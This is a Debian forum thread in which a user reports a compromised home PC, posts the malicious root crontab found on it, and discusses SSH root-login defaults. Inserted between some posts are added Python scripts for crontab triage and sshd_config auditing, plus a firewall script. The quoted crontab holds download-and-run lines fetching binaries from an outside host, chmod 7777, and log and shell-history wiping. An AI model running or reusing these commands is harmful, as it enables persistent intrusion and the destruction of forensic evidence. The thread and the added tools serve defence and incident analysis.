My home PC has been 0wn3d :(

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

My home PC has been 0wn3d :(

#1 Post by grihad »

Story line: on Jan 9th I installed Debian 7.3 from scratch after my hard disk w/ Kubuntu had crashed. On Jan 10th, the following root personal crontab was somehow installed:

(I had to split my post into several parts because otherwise this forum gave me internal server errors)
Unfortunately I couldn't post original crontab (with tons of repeated comments) because of 500 internal error, but it went something like:
s file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
Last edited by grihad on 2014-01-24 07:00, edited 2 times in total.

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#2 Post by grihad »

If we strip the comments here's what we're left with:
s file to introduce tasks to be run by cron.
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 cupsdd
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
*/120 * * * * cd /etc; wget http://www.example.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.example.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.example.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.example.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.example.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.example.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.example.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
Last edited by grihad on 2014-01-25 06:47, edited 1 time in total.
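The crontab above is a compact checklist of what a defender should be looking for in any spool file: process kills of competing miners, downloads into /etc, chmod 7777 on the dropped binaries, nohup'ed launches, truncation of everything under /var/log and shell-history tampering. The script below is an added example, not something from this thread; it parses a crontab dump, records lines that cron cannot parse as entries (like the stray "s file ..." line, which grihad suspects stopped the whole file from running) and tags the rest with heuristic indicators of my own choosing. The sample text is constructed from the shape of the posted entries.

```python
"""Triage a crontab dump for the indicators seen in the posted root crontab.

Added example, not from the thread: the sample text below is constructed from the
kinds of entries the post shows, and the indicator patterns are my own heuristics.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# A crontab entry is five time fields (or an @nickname) followed by a command.
# The grammar is deliberately minimal: it only has to separate well-formed
# entries from lines cron will reject, such as the stray "s file ..." line.
FIELD = r"(?:\*/\d+|\d+-\d+(?:/\d+)?|\d+(?:,\d+)*|\*)"
ENTRY_RE = re.compile(rf"^\s*((?:{FIELD}\s+){{5}}|@\w+\s+)(\S.*)$")
ASSIGN_RE = re.compile(r"^\s*\w+\s*=")          # SHELL=/bin/sh, PATH=..., MAILTO=...

# Heuristic indicators; each tag names the behaviour a defender would ask about.
INDICATORS = [
    ("kill-competing-processes", re.compile(r"\b(?:killall|pkill)\s+-9\b")),
    ("download-to-system-dir", re.compile(r"\bcd\s+/(?:etc|root|tmp)\b.*\b(?:wget|curl)\b")),
    ("setuid-chmod", re.compile(r"\bchmod\s+[4-7]\d{3}\b")),
    ("background-binary-in-etc", re.compile(r"\bnohup\s+/etc/\S+")),
    ("log-truncation", re.compile(r"/var/log\b.*>\s*\S+")),
    ("history-tampering", re.compile(r"\.bash_history|\bhistory\s+-[cr]\b|unset\s+MAILCHECK")),
]


@dataclass
class Report:
    invalid: list = field(default_factory=list)    # (line_no, text): cron will reject these
    findings: list = field(default_factory=list)   # (line_no, tag, command)

    def tag_counts(self):
        return Counter(tag for _, tag, _ in self.findings)


def triage(text):
    """Classify each crontab line and scan every non-comment line for indicators.

    Lines that do not parse as entries are still scanned: whether or not cron ran
    them, they are evidence of what the intruder intended."""
    report = Report()
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGN_RE.match(line):
            continue
        m = ENTRY_RE.match(line)
        if m:
            command = m.group(2)
        else:
            report.invalid.append((line_no, line))
            command = line
        for tag, pattern in INDICATORS:
            if pattern.search(command):
                report.findings.append((line_no, tag, command))
    return report


# Constructed sample in the shape of the posted crontab (trimmed; host name replaced).
SAMPLE_CRONTAB = """\
s file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
*/1 * * * * killall -9 nfsd
*/120 * * * * cd /etc; wget http://www.example.com:8080/atdd
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * cd /var/log > auth.log
*/1 * * * * history -c
0 3 * * * /usr/bin/apt-get update
"""

if __name__ == "__main__":
    report = triage(SAMPLE_CRONTAB)
    for line_no, text in report.invalid:
        print(f"line {line_no}: not a valid entry: {text!r}")
    for line_no, tag, command in report.findings:
        print(f"line {line_no}: {tag}: {command}")
    print("summary:", dict(report.tag_counts()))
```

Run it against `crontab -l -u root` output or the spool file itself; a clean crontab such as the apt-get line in the sample produces no findings, while each entry of the posted crontab lights up at least one tag.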

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#3 Post by grihad »

I believe thanks to the "s" the crontab syntax was incorrect so nothing got to run.


I accidentally stumbled across this crontab only yesterday.

How could this happen? How do you believe they obtained root filesystem access? I do use sudo without password under my normal account, but sudo always asks for your password as per tty_tickets, and refuses to run if tty isn't present, as would be the case in a script or something, with the following message:
sudo: no tty present and no askpass program specified
So how could they do that? Debian did run sshd on start without asking me, so I ditched that, probably on Jan 12-13.

pcalvert
Posts: 1931
Joined: 2006-04-21 11:19
Location: Sol Sector

Re: My home PC has been 0wn3d :(

#4 Post by pcalvert »

grihad wrote:Debian did run sshd on start without asking me, so I ditched that, probably on Jan 12-13.
Well, how did that happen? That is NOT normal. How did you install Debian?

Phil
“It is better to believe than to disbelieve; in doing so, it brings
everything into the realm of possibility.” — Albert Einstein

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#5 Post by vbrummond »

It can be a headache for some admins how Debian starts services by default. Personally I think it is, especially when I want to configure something before I launch it. For example on my system here I never touched ssh and this is what I get:

root@debian-konoe:~# /etc/init.d/ssh status
[ ok ] sshd is running.
I suppose the best thing to do is keep it off the networking during your first real boot until you disable all the services you don't need to start automatically.
Always on Debian Testing

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#6 Post by vbrummond »

Also you might want to edit those links in your post. If they are some form of malware, they could be accidentally downloaded and also they are being indexed by search engines.

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#7 Post by grihad »

vbrummond, ditto, unfortunately that's what Debian does... IIRC I chose graphical install from the official Debian ISO ("burned" onto a flash stick using YUMI).

Meanwhile I disabled root's personal crontab modification to prevent the dumbest types of automated attacks, just in case.

# chattr +i /var/spool/cron/crontabs/root

Now I know how those stupid f#$%s broke root, sshd_config has PermitRootLogin yes by default...

Way to go, Debian, not only do you run sshd on boot without warning your users, you also PermitRootLogin...

Now I see that I stopped sshd from running on boot only 2 days after the fresh install:
-rw-r--r-- 1 root root 0 Jan 11 22:14 /etc/ssh/sshd_not_to_be_run
So the freaks used that 2 day window of opportunity to break the rather weak root password I had (which was simply "root").
I wasn't expecting that people would be allowed to use the password through any means. Way to go, Debian...


vbrummond, good point, I just removed the domain name.

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#8 Post by vbrummond »

You might report a bug suggesting disabling the root account (in ssh) by default. I disable it myself. It defeats an attack vector if they can't just hammer passwords on root. You might look into fail2ban as well.

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#9 Post by grihad »

fail2ban would be great on a server, thanks. But I prefer not running any susceptible network visible servers in the first place rather than run them all and use some root daemon to update the firewall. I did install a simple firewall but again later than they broke root...
In /etc/network/interfaces:
...
pre-up /root/firewall.sh

And /root/firewall.sh is based on one I found on the Internet, which is pretty solid as it only allows incoming packets from previously initiated connections.
#!/bin/sh
# The interface and network variables below were not defined in the script as
# posted; these are placeholder values, to be replaced with the real ones.
OUTSIDE_IFACE="ppp0"        # placeholder: PPPoE uplink
INSIDE_IFACE="eth1"         # placeholder: LAN side
LOCALNET="192.168.1.0/24"   # placeholder: LAN network
MODEM_IFACE="eth0"          # placeholder: interface towards the DSL modem
MODEM_IP="192.168.0.1"      # placeholder: modem management address

# Flush previous rules, delete chains and reset counters
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

# Default policies
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# Enable loopback traffic
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

# Enable stateful rules (after that, only NEW connections need to be allowed)
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

# Drop invalid state packets
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
iptables -A OUTPUT -m conntrack --ctstate INVALID -j DROP
iptables -A FORWARD -m conntrack --ctstate INVALID -j DROP


## INPUT

# Incoming ssh from the LAN
#iptables -A INPUT -i "$INSIDE_IFACE" -s "$LOCALNET" \
# -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT

# Enable access traffic, from LAN to us
iptables -A INPUT -i "$INSIDE_IFACE" -s "$LOCALNET" -j ACCEPT

# transmission-qt
iptables -A INPUT -p tcp --dport 51413 -j ACCEPT

## OUTPUT

# Enable all outgoing traffic to the internet
iptables -A OUTPUT -o "$OUTSIDE_IFACE" -d 0.0.0.0/0 -j ACCEPT

# Enable access traffic, from the firewall to the LAN network
iptables -A OUTPUT -o "$INSIDE_IFACE" -d "$LOCALNET" -j ACCEPT
iptables -A OUTPUT -o "$MODEM_IFACE" -d "$MODEM_IP" -j ACCEPT


## FORWARD

# We have a dynamic IP (DHCP), so we have to masquerade
iptables -t nat -A POSTROUTING -o "$OUTSIDE_IFACE" -j MASQUERADE
iptables -A FORWARD -o "$OUTSIDE_IFACE" -i "$INSIDE_IFACE" -s "$LOCALNET" -m conntrack --ctstate NEW -j ACCEPT

# transparent web-proxy
iptables -t nat -A PREROUTING -i "$INSIDE_IFACE" -p tcp --dport 80 -j REDIRECT --to-port 3128

pcalvert
Posts: 1931
Joined: 2006-04-21 11:19
Location: Sol Sector

Re: My home PC has been 0wn3d :(

#10 Post by pcalvert »

grihad and vbrummond, please post the output of these commands:

$ aptitude search openssh
$ aptitude why openssh-server

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#11 Post by Birdy »

vbrummond wrote:It can be a headache for some admins how Debian starts services by default. Personally I think it is, especially when I want to configure something before I launch it. For example on my system here I never touched ssh and this is what I get:

root@debian-konoe:~# /etc/init.d/ssh status
[ ok ] sshd is running.
I suppose the best thing to do is keep it off the networking during your first real boot until you disable all the services you don't need to start automatically.
Debian doesn't install ssh-server unless you tick it during tasksel.
If you install a service and first want to configure it, stop it immediately after you installed it, configure it, start it.


sysadmin, huh?

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#12 Post by grihad »

pcalvert,
$ aptitude search openssh
p libconfig-model-openssh-perl - configuration file editor for OpenSsh
p libnet-openssh-compat-perl - collection of compatibility modules for Net::OpenSSH
p libnet-openssh-perl - Perl SSH client package implemented on top of OpenSSH
i A openssh-blacklist - list of default blacklisted OpenSSH RSA and DSA keys
i A openssh-blacklist-extra - list of non-default blacklisted OpenSSH RSA and DSA keys
i openssh-client - secure shell (SSH) client, for secure access to remote machines
i A openssh-server - secure shell (SSH) server, for secure access from remote machines
$ aptitude why openssh-server
i task-ssh-server Depends openssh-server
$
I don't use an openssh server on my home pc and don't need or want it installed, but I do use openssh client extensively.

Birdy, in any case PermitRootLogin would best be set to "no" by default, as in FreeBSD.
The OpenSSH server didn't bite me this time, PermitRootLogin did.

Interestingly, FreeBSD's sshd manpage designates the default as "no", while Debian's is "yes".
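The two points grihad makes in posts #7 and #12, that the shipped sshd_config on Debian 7 contained PermitRootLogin yes and that the compiled-in default differs between OpenSSH versions, are exactly the things a post-install check should report. The script below is an added example, not code from this thread or from OpenSSH; it parses the global section of an sshd_config the way sshd does (keywords case-insensitive, first occurrence wins, commented-out lines mean the default applies, Match blocks are conditional and ignored here) and reports the effective values of PermitRootLogin, PasswordAuthentication and PermitEmptyPasswords. The defaults assume OpenSSH 6.x, where PermitRootLogin defaulted to yes, with a switch for the prohibit-password default that OpenSSH 7.0 introduced; the two config samples are constructed.

```python
"""Audit the global section of an sshd_config for root/password exposure.

Added example, not from the thread. It relies only on OpenSSH's documented
behaviour: keywords are case-insensitive, the first occurrence of a keyword
wins, a commented-out line means the compiled-in default applies, and
PermitRootLogin defaulted to "yes" in OpenSSH 6.x (the version in Debian 7)
and to "prohibit-password" from OpenSSH 7.0 onward.
"""
import re


def defaults(openssh_major=6):
    """Compiled-in defaults for the three options audited here."""
    return {
        "permitrootlogin": "yes" if openssh_major < 7 else "prohibit-password",
        "passwordauthentication": "yes",
        "permitemptypasswords": "no",
    }


def parse_global(text):
    """Return the effective global settings (first occurrence of a keyword wins).

    Parsing stops at the first Match block: settings inside it are conditional
    and must not be mistaken for the global policy."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # sshd accepts "Keyword value" as well as "Keyword=value" / "Keyword = value"
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in settings:
            settings[key] = parts[1].strip()
    return settings


def audit(text, openssh_major=6):
    """Return (effective settings, findings) for the audited options."""
    effective = defaults(openssh_major)
    for key, value in parse_global(text).items():
        if key in effective:
            effective[key] = value.lower()
    findings = []
    if effective["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root can authenticate with its password over the network")
    if effective["passwordauthentication"] == "yes":
        findings.append("PasswordAuthentication yes: any weak account password is reachable by guessing")
    if effective["permitemptypasswords"] == "yes":
        findings.append("PermitEmptyPasswords yes: accounts with empty passwords can log in")
    return effective, findings


# Constructed samples: the first mirrors what the poster found on Debian 7
# (PermitRootLogin yes written into the shipped file), the second is the
# hardened form with a Match block that must not leak into the global result.
STOCK_DEBIAN7 = """\
Port 22
Protocol 2
PermitRootLogin yes
StrictModes yes
#PasswordAuthentication yes
UsePAM yes
"""

HARDENED = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("stock", STOCK_DEBIAN7), ("hardened", HARDENED)):
        effective, findings = audit(cfg)
        print(name, effective)
        for f in findings:
            print("  -", f)
```

Point it at /etc/ssh/sshd_config after an install (and again after any package upgrade that may rewrite the file); the stock sample yields two findings, the hardened one none, and a config that only carries the commented `#PermitRootLogin` line is reported with the compiled-in default rather than as "not set".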

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#13 Post by Birdy »

If you don't need openssh-server, then don't install it.
If you need a client: it is installed per default already.
If you need the server but don't want root-access, disable it in the config file.
If you don't know how to do that, you shouldn't run a ssh-server.
If you don't forward the ssh-server's port at your router's web interface, the internet can't do crap with your running ssh-server
(in other words: all you post is crap. If you forwarded your port without configuring properly, then that is really your problem)
This is really no witchcraft.

Last but not least: No one hinders you to use BSD. It is a rock solid operating system.

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#14 Post by grihad »

Birdy, stop being mean :D
My home pc IS the router, I initiate the PPPoE connection from it.
Didn't know Debian had the ssh client installed implicitly, thanks.

p.s. I do use FreeBSD's on servers as it seems to be "the best of the breed" (no offence, Debian), but at home I got used to Debian & Kubuntu. The installer got mucked during all these years since I don't remember OpenSSH being enabled by default from my previous installs.

llivv
Posts: 5484
Joined: 2007-02-14 18:10
Location: cold storage

Re: My home PC has been 0wn3d :(

#15 Post by llivv »

0wn3d :(
grihad wrote:(no offence, Debian), but at home I got used to Debian & Kubuntu. The installer got mucked during all these years since I don't remember OpenSSH being enabled by default from my previous installs.
Humm !
what next?
In memory of Ian Ashley Murdock (1973 - 2015) founder of the Debian project.

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#16 Post by Birdy »

grihad wrote:Birdy, stop being mean :D
My home pc IS the router, I initiate the PPPoE connection from it.
Didn't know Debian had the ssh client installed implicitly, thanks.

p.s. I do use FreeBSD's on servers as it seems to be "the best of the breed" (no offence, Debian), but at home I got used to Debian & Kubuntu. The installer got mucked during all these years since I don't remember OpenSSH being enabled by default from my previous installs.
No router. I see.

Let me check if i got everything right:
You live in Baku.
You have got Debian installed at home and are running BSD-servers
You also got Kubuntu running (or sometimes Debian and sometimes Kubuntu?) at home.
But you haven't got a decent router?

Besides that you experienced the very unusual thing of getting cracked, for the only reason that sshd was running and root-login was allowed.
While for other people ssh-server doesn't get installed per default, for you it did get (ok, the superadmin has the same experience, but no one else)..

And, last but not least, though being used to the BSD installer you decided to install from a liveCD? Or did you use the graphical installer from CD1?

I got everything right?
If yes: Does all of that sound very likely? (Speaking of the sum of all that, not each single thing).
It doesn't. If it is true anyway: I can send you a cheap router for free, assuming you can't afford one yourself (Belkin with wireless or Netgear without wireless, an old FritzBox, what you want). Send me a pm and we can get it sorted.

I am not mean or unfriendly. I only point out the obvious (sit back and think a bit: if you heard such stories from someone else, what would _you think?).

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#17 Post by vbrummond »

Birdy wrote:Debian doesn't install ssh-server unless you tick it during tasksel.
It could be installed for a number of reasons. In my case it was installed and enabled by default.
If you install a service and first want to configure it, stop it immediately after you installed it, configure it, start it.
sysadmin, huh?
Sysadmin, huh? Kid, grow up.

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#18 Post by Birdy »

vbrummond wrote:
Birdy wrote:Debian doesn't install ssh-server unless you tick it during tasksel.
It could be installed for a number of reasons. In my case it was installed and enabled by default.
.
No. Plain and simple.

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#19 Post by vbrummond »

It must be fun being wrong. I installed using a prebuilt image of the system, which had ssh included and enabled.

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#20 Post by Birdy »

vbrummond wrote:It must be fun being wrong. I installed using a prebuilt image of the system, which had ssh included and enabled.
That is really your problem, not of Debian.
